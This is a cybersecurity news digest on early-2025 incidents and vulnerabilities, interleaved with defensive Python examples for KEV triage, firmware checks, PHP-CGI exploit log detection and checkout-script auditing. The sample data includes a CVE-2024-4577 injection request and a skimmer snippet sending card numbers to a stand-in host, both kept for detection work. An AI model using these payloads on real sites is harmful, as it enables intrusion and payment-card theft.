👉 What’s trending in cybersecurity today?
Mirai Botnet, Four-Faith Router Flaws, Global DDoS Attacks, CISA, Mitel MiCollab, Oracle Flaws, Illumina iSeq 100, DNA Sequencer, IBM Concert Software, Sensitive Data, System Integrity, PHP Server Vulnerability, PacketCrypt Cryptocurrency Miner, Green Bay Packers Retail Store, Card Skimmer Script, ICAO, Recruitment System Hack, Orange Finance, Crypto Assets Stolen, Casio, Ransomware Attack, PowerSchool Breach, Student Data, U.S. Cyber Trust Mark, IoT Devices, T-Mobile, Personal Data, Telegram, U.S. Law Enforcement, Veracode, Phylum Assets, Open Source Security, Meta, Fact-Checking Program, Community Notes System.
🚨 Cyber Alerts
A Mirai botnet variant named “gayfemboy” has been exploiting vulnerabilities in Four-Faith industrial routers to orchestrate large-scale DDoS attacks globally. Using more than 20 known flaws, including the critical CVE-2024-12856, the malware has compromised devices in countries including China, Iran, and the United States, with roughly 15,000 active bot IPs per day. Its attacks have reached about 100 Gbps and hit hundreds of targets, showing how quickly the botnet adapts and expands its reach. Experts warn that the evolving tactics of such malware pose a significant risk to industries, governments, and individuals alike.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three vulnerabilities in Mitel MiCollab and Oracle WebLogic Server to its Known Exploited Vulnerabilities (KEV) catalog. The flaws, including the critical CVE-2024-41713 with a CVSS score of 9.1, could allow attackers to gain unauthorized access to systems or read sensitive files. Federal agencies must apply the necessary patches by January 28, 2025, to mitigate the risk and secure their networks against exploitation.
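The practical follow-up to a KEV addition is to check whether any catalogued CVE is present in your own estate and how long remains before its due date. The script below is an added example (not from the digest or from CISA): it reads a local copy of the KEV JSON feed and triages an inventory of CVE IDs against it. The field names (cveID, vendorProject, product, dueDate, knownRansomwareCampaignUse) follow the public KEV JSON schema, but the feed content here is constructed sample data that reuses only the CVE ID and due date quoted above plus one well-known older entry (Log4Shell); the inventory list is likewise an assumption for illustration.

```python
"""Added example: triage an inventory of CVE IDs against a local copy of the CISA KEV feed.
Field names follow the public KEV JSON schema; the entries are CONSTRUCTED sample data."""
import json
from datetime import date

# Constructed sample in the shape of the KEV feed.  Real use: download
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
SAMPLE_KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (constructed sample)",
    "vulnerabilities": [
        {"cveID": "CVE-2024-41713", "vendorProject": "Mitel", "product": "MiCollab",
         "dateAdded": "2025-01-07", "dueDate": "2025-01-28",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
         "knownRansomwareCampaignUse": "Known"},
    ],
})


def load_kev(kev_json: str) -> dict:
    """Index the KEV feed by CVE ID for O(1) lookups."""
    feed = json.loads(kev_json)
    return {entry["cveID"]: entry for entry in feed["vulnerabilities"]}


def triage(kev_json: str, inventory: list, today_iso: str) -> dict:
    """Map each inventory CVE to 'not-in-kev', 'due-in-N-days' or 'overdue-by-N-days'.

    today_iso is passed explicitly (YYYY-MM-DD) so the result is reproducible."""
    kev = load_kev(kev_json)
    today = date.fromisoformat(today_iso)
    result = {}
    for cve in inventory:
        entry = kev.get(cve)
        if entry is None:
            result[cve] = "not-in-kev"
            continue
        delta = (date.fromisoformat(entry["dueDate"]) - today).days
        if delta >= 0:
            result[cve] = f"due-in-{delta}-days"
        else:
            result[cve] = f"overdue-by-{-delta}-days"
    return result


def ransomware_linked(kev_json: str, inventory: list) -> list:
    """CVEs from the inventory that KEV marks as used in known ransomware campaigns."""
    kev = load_kev(kev_json)
    return [cve for cve in inventory
            if cve in kev and kev[cve].get("knownRansomwareCampaignUse") == "Known"]


if __name__ == "__main__":
    # Assumed inventory: two CVEs from this digest plus Log4Shell.
    inventory = ["CVE-2024-41713", "CVE-2021-44228", "CVE-2024-7254"]
    for cve, status in triage(SAMPLE_KEV_JSON, inventory, "2025-01-08").items():
        print(f"{cve}: {status}")
    print("ransomware-linked:", ransomware_linked(SAMPLE_KEV_JSON, inventory))
```

The KEV due dates bind federal civilian agencies under BOD 22-01, but the same feed is a cheap prioritisation signal for anyone: a CVE that is in KEV and overdue should outrank a higher-CVSS CVE that nobody is known to exploit.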
Researchers have identified severe vulnerabilities in the Illumina iSeq 100 DNA sequencing instrument. The flaws stem from outdated BIOS firmware, the absence of Secure Boot, and missing firmware write protections, which together allow an attacker with access to the system to overwrite its firmware and either disable the device or implant persistent malware. Because these instruments underpin medical and vaccine research, the consequences could include tampered genetic data and ransomware-driven disruption.
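The two weaknesses named above, Secure Boot disabled and BIOS flash writable from the operating system, are both checkable from the host. The following added example (not from the digest or from Illumina) decodes the two raw values involved so it runs offline on constructed inputs: the Linux efivarfs dump of the UEFI SecureBoot variable (4 attribute bytes followed by a 1-byte value) and the Intel PCH BIOS_CNTL register (LPC bridge offset 0xDC, the same bits that chipsec's bios_wp module reads). On a real host you would obtain these from /sys/firmware/efi/efivars/ and from chipsec or a similar tool; the sample values here are assumptions, not readings from the iSeq 100.

```python
"""Added example: decode Secure Boot state and Intel BIOS_CNTL write-protection bits.
Inputs are CONSTRUCTED; on a real host read the efivar file and the PCH register."""

# Linux efivarfs path for the UEFI SecureBoot variable (EFI_GLOBAL_VARIABLE GUID).
SECUREBOOT_EFIVAR = "SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c"


def secure_boot_enabled(efivar_bytes: bytes) -> bool:
    """efivarfs files are 4 bytes of variable attributes followed by the data; SecureBoot's data is one byte (1 = on)."""
    if len(efivar_bytes) < 5:
        raise ValueError("SecureBoot variable must be 4 attribute bytes + 1 data byte")
    return efivar_bytes[4] == 1


# Intel PCH BIOS_CNTL bit layout (LPC bridge B0:D31:F0, offset 0xDC).
BIOSWE = 1 << 0   # BIOS Write Enable: 1 = flash writable from the OS
BLE = 1 << 1      # BIOS Lock Enable: setting BIOSWE raises an SMI so firmware can veto it
SMM_BWP = 1 << 5  # SMM BIOS Write Protect: writes only honoured while in SMM


def bios_write_protected(bios_cntl: int) -> bool:
    """Conservative rule: protected only if BLE and SMM_BWP are set and BIOSWE is clear."""
    return bool(bios_cntl & BLE) and bool(bios_cntl & SMM_BWP) and not (bios_cntl & BIOSWE)


def firmware_findings(efivar_bytes: bytes, bios_cntl: int) -> list:
    """Summarise the two checks as a list of findings (empty list = both protections present)."""
    findings = []
    if not secure_boot_enabled(efivar_bytes):
        findings.append("Secure Boot disabled: unsigned bootloaders and boot-time code will be accepted")
    if not bios_write_protected(bios_cntl):
        findings.append(f"BIOS flash writable from the OS (BIOS_CNTL=0x{bios_cntl:02x}): "
                        "an administrator-level attacker can overwrite firmware")
    return findings


if __name__ == "__main__":
    # Constructed values: attributes NV|BS|RT (0x07) then value 0 = Secure Boot off;
    # BIOS_CNTL 0x01 = BIOSWE set, BLE and SMM_BWP clear.
    for f in firmware_findings(b"\x07\x00\x00\x00\x00", 0x01):
        print("FINDING:", f)
    print("hardened host findings:", firmware_findings(b"\x07\x00\x00\x00\x01", 0x22))
```

Two caveats: BIOS_CNTL is only one layer, and the SPI controller's protected-range registers (PR0-PR4) and flash descriptor settings also decide whether the BIOS region is writable, so treat an empty findings list as necessary rather than sufficient; and a legacy-BIOS (CSM) boot has no SecureBoot variable at all, which is itself the finding.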
IBM Concert Software has several vulnerabilities that put system integrity and sensitive data at risk. The flaws, spread across different components of the software, include stack overflow and denial-of-service conditions as well as improper input validation. High-profile entries such as CVE-2024-7254 and CVE-2024-52367 show how an attacker could trigger denial of service or leak confidential data.
A critical vulnerability in PHP, CVE-2024-4577, has been exploited to deploy the PacketCrypt Classic cryptocurrency miner. The flaw affects PHP-CGI deployments on Windows using certain locales and enables remote code execution through argument injection into the php-cgi command line. Other malware, including Gh0st RAT and the RedTail cryptominer, has already been delivered through the same flaw, underscoring how quickly attackers adopted it.
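Because exploitation leaves a distinctive mark in web server logs, a log-side check is the quickest triage. The script below is an added example (not from the digest): it flags requests whose query string carries a URL-encoded soft hyphen (0xAD) in an option position, which is the indicator PHP's own published mitigation blocks (a rewrite rule rejecting query strings that begin with %ad), since affected Windows locales map 0xAD to '-' and php-cgi then parses it as a command-line option. The fixed versions used by the version gate (8.3.8, 8.2.20, 8.1.29) are from the PHP release announcements; the access log lines are constructed.

```python
"""Added example: spot CVE-2024-4577 exploitation attempts in access logs and gate by PHP version.
Log lines are CONSTRUCTED; fixed-version numbers are from the PHP release announcements."""
import re
from urllib.parse import unquote_to_bytes

# Request target out of a combined-log-format line.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Soft hyphen (0xAD) followed by an option letter, at the start of the query
# string or after a '+' / space separator (php-cgi splits the query on those).
INJECT_RE = re.compile(rb"(?:^|[+ ])\xad[A-Za-z]")

SAMPLE_LOG = """\
203.0.113.7 - - [08/Jan/2025:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [08/Jan/2025:10:01:05 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 88
203.0.113.9 - - [08/Jan/2025:10:01:06 +0000] "GET /test.php?%adn HTTP/1.1" 200 44
198.51.100.4 - - [08/Jan/2025:10:02:00 +0000] "GET /search.php?q=%E2%80%94d HTTP/1.1" 200 300
"""


def suspicious_requests(log_text: str) -> list:
    """Return (line_number, decoded_query) for requests showing the 0xAD option-injection pattern."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        raw = unquote_to_bytes(query)   # %AD -> 0xAD; '+' is left as-is (not a space here)
        if INJECT_RE.search(raw):
            hits.append((n, raw.decode("latin-1")))
    return hits


# First fixed release per supported branch; 8.0 and older were end-of-life and never fixed.
FIXED = {(8, 3): (8, 3, 8), (8, 2): (8, 2, 20), (8, 1): (8, 1, 29)}


def php_version_vulnerable(version: str) -> bool:
    """True if a Windows php-cgi build of this version predates the fix."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    branch = parts[:2]
    if branch not in FIXED:
        return parts < (8, 1)   # EOL branches (7.x, 8.0) stay vulnerable; 8.4+ shipped fixed
    return parts < FIXED[branch]


if __name__ == "__main__":
    for line_no, query in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {query!r}")
    for v in ("8.3.7", "8.3.8", "8.1.28", "7.4.33"):
        print(v, "vulnerable" if php_version_vulnerable(v) else "fixed")
```

The em-dash request on the last sample line is there to show that the check keys on the single byte 0xAD, not on any dash-like character. It will miss a soft hyphen sent as a raw UTF-8 sequence (0xC2 0xAD) rather than percent-encoded, so on logs that store raw bytes extend the pattern accordingly; and a positive hit only means an attempt, so pair it with the version gate and with the response size or status to judge success.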
💥 Cyber Incidents
The Green Bay Packers reported that their official online store was compromised, with the intrusion discovered in October 2024. A threat actor injected a card skimmer script into the checkout page, stealing personal and payment data from affected customers. The team immediately disabled checkout and launched an investigation, which later established that the skimmer had been active during windows between September and October 2024 and that only a limited set of payment methods was affected.
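A skimmer of this kind is, by definition, a script on the checkout page that was not there before, so the cheapest control is a script inventory compared against an approved baseline. The following added example (not from the digest, and not the Packers' store or the actual skimmer) parses a checkout page, records the host of every external script and a SHA-256 of every inline script, and reports anything outside the baseline. The checkout HTML and the baseline are constructed, and the injected inline snippet is a harmless stand-in that only illustrates the shape of a skimmer (a submit handler that copies a field to a third-party host).

```python
"""Added example: inventory checkout-page scripts and flag anything outside an approved baseline.
The HTML and the baseline are CONSTRUCTED; the 'skimmer' is a non-functional illustration."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptInventory(HTMLParser):
    """Collect external script hosts and SHA-256 digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # netloc of every <script src=...>
        self.inline = []     # (sha256 hex, first 60 chars) of every inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(urlparse(src).netloc or "(relative)")
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip()
            self.inline.append((hashlib.sha256(body.encode()).hexdigest(), body[:60]))
            self._in_script = False


def audit_checkout(html: str, allowed_hosts: set, allowed_inline_sha256: set) -> list:
    """Return human-readable findings for scripts not covered by the baseline (empty = clean)."""
    inv = ScriptInventory()
    inv.feed(html)
    findings = []
    for host in inv.external:
        if host not in allowed_hosts:
            findings.append(f"unapproved external script host: {host}")
    for digest, preview in inv.inline:
        if digest not in allowed_inline_sha256:
            findings.append(f"unapproved inline script sha256={digest[:16]}...: {preview!r}")
    return findings


# Constructed checkout page: one approved external script, one approved inline
# script, then an injected third-party script and an injected inline handler.
CHECKOUT_HTML = """<html><head>
<script src="https://shop.example.com/static/checkout.js"></script>
<script>window.cartTotal = 42.00;</script>
</head><body>
<form id="payment"><input name="card"></form>
<script src="https://cdn.evil-analytics.example/s.js"></script>
<script>document.getElementById('payment').addEventListener('submit', function () {
  new Image().src = 'https://collector.example/?c=' + encodeURIComponent(document.forms.payment.card.value);
});</script>
</body></html>"""

BASELINE_HOSTS = {"shop.example.com"}
BASELINE_INLINE = {hashlib.sha256(b"window.cartTotal = 42.00;").hexdigest()}


def demo() -> list:
    """Run the audit on the constructed page against the constructed baseline."""
    return audit_checkout(CHECKOUT_HTML, BASELINE_HOSTS, BASELINE_INLINE)


if __name__ == "__main__":
    for f in demo():
        print("FINDING:", f)
```

Run this on a schedule from outside the site (a synthetic checkout fetch) rather than from inside it, since a skimmer may behave differently for real browsers; and turn the baseline into enforcement with a Content-Security-Policy whose script-src and connect-src name only the approved hosts, which blocks both the injected loader and its exfiltration request even when the inventory check is late.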
The International Civil Aviation Organization (ICAO) confirmed a hack of its recruitment database, affecting over 40,000 records. The compromised data, spanning from April 2016 to July 2024, includes personal information like names, email addresses, and employment history. However, ICAO emphasized that no sensitive data such as financial information or passwords was exposed, and the incident was limited to its recruitment systems, not affecting aviation safety or security.
Orange Finance, a liquidity management protocol operating on Arbitrum, has been hacked, leading to the loss of approximately $787,000 in cryptocurrency. The attacker gained access to the administrator address, upgraded the contract, and transferred the stolen funds to their own wallet. In response, Orange Finance has reached out to the attacker through Arbiscan in an attempt to negotiate the return of the stolen assets. Users are urged to revoke all contract authorizations and cease any interactions with the compromised protocol to prevent further losses.
Casio, a major electronics manufacturer, has acknowledged a significant data breach following a ransomware attack in October 2024. The attack led to the leak of personal data belonging to employees, customers, and business partners, including sensitive HR information, contact details, and internal business data. The company stated that it did not meet the ransom demands of the Underground ransomware group, which claimed to have exfiltrated 204.9 GB of data.
Walker County Schools in Georgia is addressing a cybersecurity incident involving PowerSchool, the provider of its student information system. The breach, discovered on December 28, 2024, was traced to the unauthorized access of PowerSchool’s customer support portal, PowerSource. According to PowerSchool, information related to families and educators in Walker County was accessed, but there is no evidence of malware or continued unauthorized activity.
📢 Cyber News
The U.S. government introduced the U.S. Cyber Trust Mark, a cybersecurity label aimed at IoT consumer devices. The label will indicate products that meet rigorous cybersecurity standards and will feature a QR code linking to information about security features, updates, and configuration tips. Eligible products include home security cameras, smart appliances, and fitness trackers, while medical devices and certain regulated products are excluded. Manufacturers must have their products tested by accredited labs and submit applications to use the label, ensuring consumers can confidently assess the security of their devices.
Washington state has filed a lawsuit against T-Mobile for failing to adequately protect the personal data of over 2 million residents during a 2021 breach. The breach, which lasted for months undetected, exposed sensitive information, including Social Security numbers, and T-Mobile allegedly misled customers about the severity of the incident. The lawsuit seeks penalties, improved cybersecurity practices, and compensation for affected customers.
Telegram revealed that it fulfilled 900 U.S. government requests in 2024, sharing the phone numbers and IP addresses of 2,253 users. This marks a significant increase over previous years, following a policy shift in September 2024 that expanded data-sharing to include cases beyond terrorism, such as cybercrime and online fraud. While this move aims to comply with authorities, it has drawn attention from cybercrime groups, though the impact on the platform’s criminal landscape remains unclear.
Veracode, a software code analysis firm, announced its acquisition of key assets from Phylum, a startup focused on software supply chain security. The transaction, which included Phylum’s malicious package analysis and detection technology, aims to bolster Veracode’s ability to identify and mitigate risks in open-source libraries. This acquisition comes as software supply chain attacks are predicted to significantly increase in cost, and Veracode plans to integrate Phylum’s technology into its own products to better protect customers from such threats.
Meta has announced the end of its fact-checking program, replacing it with a community-driven “community notes” system. CEO Mark Zuckerberg cited a shift towards free speech and a cultural tipping point as the driving factors for the change, noting that the new system would resemble X’s Community Notes. Meta’s previous fact-checking initiative, launched in 2016, had involved over 90 third-party organizations that reviewed content in multiple languages.
Copyright © 2025 CyberMaterial. All Rights Reserved.